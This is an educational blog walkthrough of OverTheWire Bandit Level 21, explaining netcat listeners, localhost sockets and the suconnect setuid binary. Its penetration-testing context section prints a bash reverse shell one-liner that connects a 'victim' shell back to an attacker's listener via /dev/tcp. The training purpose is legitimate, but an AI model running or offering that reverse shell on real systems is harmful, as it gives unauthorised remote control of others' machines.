Skip to main content
🧠Educationalintermediate13 min read
β€’

OverTheWire Bandit Level 21: Network Programming and Localhost Connections

OverTheWire Bandit Level 21 walkthrough. Learn about network programming, localhost connections, using netcat as a listener, and how setuid binaries can interact with network services.

OverTheWireBanditLinuxnetcatnetwork programmingsetuidintermediateCTF
Share:𝕏inβ¬‘βœ‰
πŸ”—OverTheWire Bandit Series
Part 22 of 34
πŸ“šView all posts in OverTheWire Bandit series

🌐 OverTheWire Bandit Level 21: Network Programming and Localhost Connections

Level 21 builds on what you learned in Level 20 about setuid binaries, but adds a network programming twist. This level introduces localhost connections, netcat, and how programs can communicate over network socketsβ€”even on the same machine.

Level 21 teaches you:

  • How setuid binaries can make network connections
  • Using netcat (nc) as a network listener
  • Understanding localhost connections
  • Working with network sockets
  • Multi-terminal workflows for network testing

If you've made it this far, you understand setuid binaries. Now you're learning how they can interact with network services, which is a common pattern in privilege escalation and network exploitation.

🎯 The Objective

After logging into bandit20, your goal is to find the password for Level 21. There's a setuid binary called suconnect that connects to localhost on a port you specify, reads a password, and if it matches the bandit20 password, it sends back the bandit21 password.

What Level 21 teaches:

  • Network programming concepts
  • Using netcat as a listener
  • Localhost connections
  • Multi-terminal workflows
  • How programs communicate over sockets

The challenge: You need to set up a listener on a port, run the setuid binary to connect to that port, send it the bandit20 password, and receive the bandit21 password back.

πŸ” Understanding the Problem

Let's start by connecting to Level 20 and seeing what we're dealing with:

sshpass -p `cat bandit20` ssh bandit20@bandit.labs.overthewire.org -p 2220

Once connected, let's see what's in the directory:

ls -la

You should see a binary file called suconnect. This is a setuid binary that handles network connections.

The problem: The binary connects to localhost on a port you specify, reads a password from the connection, compares it to the bandit20 password, and if it matches, sends back the bandit21 password. You need to set up a listener to communicate with it.

🧠 Understanding Network Programming and Localhost

Here's what's happening: Programs can communicate over network sockets, even on the same machine using localhost (127.0.0.1).

What Is Localhost?

Localhost (IP address 127.0.0.1) refers to the current machine. When a program connects to localhost, it's connecting to a service running on the same computer, not a remote server.

Why this matters:

  • Programs can communicate with each other on the same machine
  • Useful for inter-process communication
  • Common in client-server architectures
  • Used in privilege escalation and exploitation

How Network Connections Work

When two programs communicate over a network:

  1. Server (Listener) β€” Opens a socket and waits for connections
  2. Client β€” Connects to the server's socket
  3. Data Exchange β€” Both sides can send and receive data
  4. Connection Close β€” Either side can close the connection

In Level 21:

  • Server: Your netcat listener (waiting for connections)
  • Client: The suconnect binary (connects to your listener)
  • Data: Password exchange

Understanding netcat

netcat (nc) is a versatile networking tool that can:

  • Act as a client (connect to servers)
  • Act as a server (listen for connections)
  • Transfer data over TCP/UDP
  • Create network tunnels
  • Test network connectivity

Common netcat options:

  • -l β€” Listen mode (act as server)
  • -v β€” Verbose output
  • -p β€” Specify port (for listening)
  • -n β€” Don't resolve hostnames (faster)

πŸ“‹ Step-by-Step Walkthrough

Step 1: Connect to Level 20

sshpass -p `cat bandit20` ssh bandit20@bandit.labs.overthewire.org -p 2220

Step 2: Check What's Available

ls -la

You should see suconnect. Let's check its permissions:

ls -la suconnect

It should be a setuid binary owned by bandit21.

Step 3: Understand How suconnect Works

The suconnect binary:

  • Takes a port number as an argument
  • Connects to localhost on that port
  • Reads a line of text from the connection
  • Compares it to the bandit20 password
  • If correct, sends back the bandit21 password

The workflow:

  1. Set up a listener on a port (using netcat)
  2. Run suconnect with that port number
  3. Send the bandit20 password to the listener
  4. Receive the bandit21 password back

Step 4: Set Up Two Terminal Sessions

You'll need two terminal sessions connected to bandit20:

Terminal 1: Will run the netcat listener Terminal 2: Will run the suconnect binary

Option A: Use tmux (Recommended)

If you have tmux installed, you can split your terminal:

# Start tmux
tmux

# Split horizontally (Ctrl+B, then ")
tmux split-window -h

# Switch between panes (Ctrl+B, then arrow keys)

Option B: Open Two SSH Sessions

Simply open two terminal windows and SSH into bandit20 in both.

Option C: Use screen

Similar to tmux:

screen
# Split: Ctrl+A, then S
# Switch: Ctrl+A, then Tab

Step 5: Set Up the Listener (Terminal 1)

In your first terminal, set up a netcat listener on port 8888 (or any port you choose):

nc -lvp 8888

Breaking this down:

  • nc β€” netcat command
  • -l β€” Listen mode (act as server)
  • -v β€” Verbose (show connection details)
  • -p 8888 β€” Listen on port 8888

What you'll see:

listening on [any] 8888 ...

The listener is now waiting for a connection.

Step 6: Run suconnect (Terminal 2)

In your second terminal, run the suconnect binary with the port number:

./suconnect 8888

What happens:

  • suconnect connects to localhost:8888
  • Your netcat listener receives the connection
  • You'll see a connection message in Terminal 1

In Terminal 1, you should see:

connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 12345

The connection is established!

Step 7: Send the Password

Now you need to send the bandit20 password to the connection. In Terminal 1 (where netcat is listening), paste or type the bandit20 password and press Enter.

Important:

  • The prompt might just be blinkingβ€”that's normal
  • You can paste the password (Ctrl+V or right-click β†’ Paste)
  • Press Enter after pasting

What happens:

  • suconnect reads the password
  • Compares it to the stored bandit20 password
  • If correct, sends back the bandit21 password
  • You'll see the password in Terminal 1

Step 8: Save the Password

Copy the bandit21 password from Terminal 1 and save it:

On Linux/macOS:

echo "PASSWORD_HERE" > bandit21

On Windows (PowerShell):

"PASSWORD_HERE" | Out-File -FilePath bandit21 -NoNewline

Step 9: Connect to Level 21

sshpass -p `cat bandit21` ssh bandit21@bandit.labs.overthewire.org -p 2220

πŸ’‘ Understanding Network Programming in Depth

Let's dive deeper into how network programming works:

TCP Sockets

TCP (Transmission Control Protocol) is a reliable, connection-oriented protocol. When programs communicate over TCP:

  1. Server creates a socket and binds to a port
  2. Server listens for connections
  3. Client creates a socket and connects to server
  4. Connection established β€” both sides can send/receive data
  5. Connection closed β€” either side can close

In Level 21:

  • netcat creates a TCP server socket
  • suconnect creates a TCP client socket
  • They exchange data over the connection

Localhost vs. Remote Connections

Localhost (127.0.0.1):

  • Connects to services on the same machine
  • Faster (no network overhead)
  • More secure (doesn't leave the machine)
  • Used for inter-process communication

Remote connections:

  • Connect to services on other machines
  • Requires network routing
  • Can be intercepted
  • Used for distributed systems

Why Level 21 uses localhost:

  • The suconnect binary connects to a service you control
  • You set up the listener on the same machine
  • No external network access needed
  • Simpler setup for the challenge

Port Numbers

Ports are numbers that identify specific services on a machine. Common ports:

  • 22 β€” SSH
  • 80 β€” HTTP
  • 443 β€” HTTPS
  • 8888 β€” Often used for development/testing

In Level 21:

  • You choose the port (e.g., 8888)
  • netcat listens on that port
  • suconnect connects to that port
  • Both must use the same port number

πŸ”’ Real-World Context

Why does this matter in penetration testing?

Network programming concepts are essential for understanding:

  • How services communicate
  • How to exploit network vulnerabilities
  • How to set up listeners for reverse shells
  • How to test network services
  • How privilege escalation can involve network connections

1. Reverse Shells

In penetration testing, you often need to get a shell back to your machine:

# On your machine (attacker)
nc -lvp 4444

# On target machine (victim)
bash -i >& /dev/tcp/your-ip/4444 0>&1

The concept: Same as Level 21β€”set up a listener, have the target connect to you.

2. Port Forwarding

Sometimes you need to forward ports through firewalls:

# Forward local port to remote port
ssh -L 8080:localhost:80 user@target

The concept: Understanding how ports work is essential.

3. Service Exploitation

When exploiting services, you often:

  • Connect to a port
  • Send crafted input
  • Receive responses
  • Exploit vulnerabilities

The skill you're learning: How programs communicate over networks. This is essential for:

  • Network penetration testing
  • Understanding service vulnerabilities
  • Setting up listeners and handlers
  • Reverse shell techniques
  • Port forwarding and tunneling

πŸ› οΈ Alternative Methods

Here are different ways to approach Level 21:

Terminal 1:

nc -lvp 8888
# Wait for connection, then paste password

Terminal 2:

./suconnect 8888

Pros: Simple, clear separation Cons: Requires two terminal windows

Method 2: Using tmux

Single terminal with split panes:

tmux
# Split: Ctrl+B, then "
# Pane 1: nc -lvp 8888
# Pane 2: ./suconnect 8888

Pros: Single terminal, easy to see both Cons: Requires tmux knowledge

Method 3: Background Process

Run listener in background:

nc -lvp 8888 &
./suconnect 8888
# Then send password to the listener

Pros: Single terminal Cons: Can be confusing with background processes

Method 4: Using screen

Similar to tmux:

screen
# Split: Ctrl+A, then S
# Pane 1: nc -lvp 8888
# Pane 2: ./suconnect 8888

Pros: Works on most systems Cons: Less intuitive than tmux

For Level 21, use Method 1 or 2 β€” they're the clearest.

🚨 Common Mistakes

Mistake 1: Not Setting Up the Listener First

Wrong:

# Running suconnect before listener is ready
./suconnect 8888
# Connection refused!

Right:

# Terminal 1: Set up listener first
nc -lvp 8888

# Terminal 2: Then run suconnect
./suconnect 8888

Why: The listener must be running before the client connects.

Mistake 2: Using Wrong Port Numbers

Wrong:

# Terminal 1
nc -lvp 8888

# Terminal 2
./suconnect 9999  # Wrong port!

Right:

# Both use the same port
nc -lvp 8888
./suconnect 8888

Why: Both sides must use the same port number.

Mistake 3: Not Sending the Password

Wrong: Setting up listener and running suconnect, but forgetting to send the password.

Right: After suconnect connects, immediately paste the bandit20 password into the netcat listener.

Why: suconnect waits for input. If you don't send it, nothing happens.

Mistake 4: Sending Wrong Password

Wrong: Sending a password from a different level or making a typo.

Right: Make sure you're using the exact bandit20 password (the one you used to connect to Level 20).

Why: suconnect compares the input to the stored bandit20 password. If it doesn't match, you won't get the bandit21 password.

Mistake 5: Not Understanding the Connection Flow

Wrong thinking: "I'll just run suconnect and it will give me the password."

Reality: You need to set up a listener, have suconnect connect to it, send the password, and receive the response.

Solution: Understand the client-server model: listener (server) waits, suconnect (client) connects, you send data, you receive response.

πŸ’» Practice Exercise

Try these to reinforce what you learned:

  1. Set up a simple echo server:

    # Terminal 1
nc -lvp 9999

# Terminal 2
echo "Hello" | nc localhost 9999

  2. Test localhost connectivity:

    # Check if a port is listening
netstat -tuln | grep 8888

  3. Create a simple chat:

    # Terminal 1
nc -lvp 7777

# Terminal 2
nc localhost 7777
# Type messages back and forth

  4. Understand port states:

    # See listening ports
ss -tuln

πŸŽ“ Understanding Client-Server Architecture

This level introduces the client-server model:

What Is Client-Server?

Client-server is a network architecture where:

  • Server β€” Provides a service, waits for connections
  • Client β€” Requests the service, initiates connections
  • Protocol β€” Rules for communication

In Level 21:

  • Server: netcat listener (provides password verification service)
  • Client: suconnect binary (requests password)
  • Protocol: TCP, text-based

Why Client-Server Matters

Understanding client-server architecture is essential for:

  • Network programming
  • Web development
  • Service exploitation
  • Reverse shells
  • Port forwarding

The skill you're learning: How to set up network listeners and communicate with network services. This is fundamental for:

  • Penetration testing
  • Network security
  • Service exploitation
  • Reverse shell techniques

πŸ”— What's Next?

Level 22 will likely introduce another network or system concept. You'll continue building on the concepts you've learned about setuid binaries, network programming, and privilege escalation.

Before moving on, make sure you:

  • βœ… Understand how localhost connections work
  • βœ… Know how to use netcat as a listener
  • βœ… Can set up multi-terminal workflows
  • βœ… Understand the client-server model
  • βœ… Know how to send and receive data over network connections

πŸ“š Key Takeaways

After completing Level 21, you should understand:

  1. Network programming β€” How programs communicate over sockets
  2. Localhost connections β€” Connecting to services on the same machine
  3. netcat β€” Using nc as a network listener
  4. Client-server model β€” How clients and servers interact
  5. Multi-terminal workflows β€” Managing multiple sessions

🎯 Quick Reference

ConceptExplanationExample
LocalhostSame machine (127.0.0.1)nc localhost 8888
netcat listenerServer waiting for connectionsnc -lvp 8888
ClientProgram that connects./suconnect 8888
PortNumber identifying service8888
TCP socketConnection between programsEstablished when client connects

πŸ” Advanced: Understanding Network Sockets

If you want to go deeper, here's how network sockets work:

Socket Creation

When a program creates a socket:

// Server side
socket(AF_INET, SOCK_STREAM, 0);  // Create socket
bind(sock, &addr, sizeof(addr));  // Bind to port
listen(sock, 5);                   // Listen for connections
accept(sock, ...);                 // Accept connection

// Client side
socket(AF_INET, SOCK_STREAM, 0);  // Create socket
connect(sock, &addr, sizeof(addr)); // Connect to server

Data Exchange

Once connected, both sides can:

  • send() β€” Send data
  • recv() β€” Receive data
  • close() β€” Close connection

In Level 21:

  • netcat handles socket creation automatically
  • suconnect handles socket creation automatically
  • You just send/receive text

Questions about Level 21, network programming, or netcat? Reach out directly:

M Square LLC
Cybersecurity | Penetration Testing | No-Nonsense Advice

Found this helpful? Share it:

Share:𝕏inβ¬‘βœ‰

Need Help With This?

Have questions about implementing these security practices? Let's discuss your specific needs.

Get in Touch

More in Educational

Explore more articles in this category.

Browse 🧠 Educational

Related Articles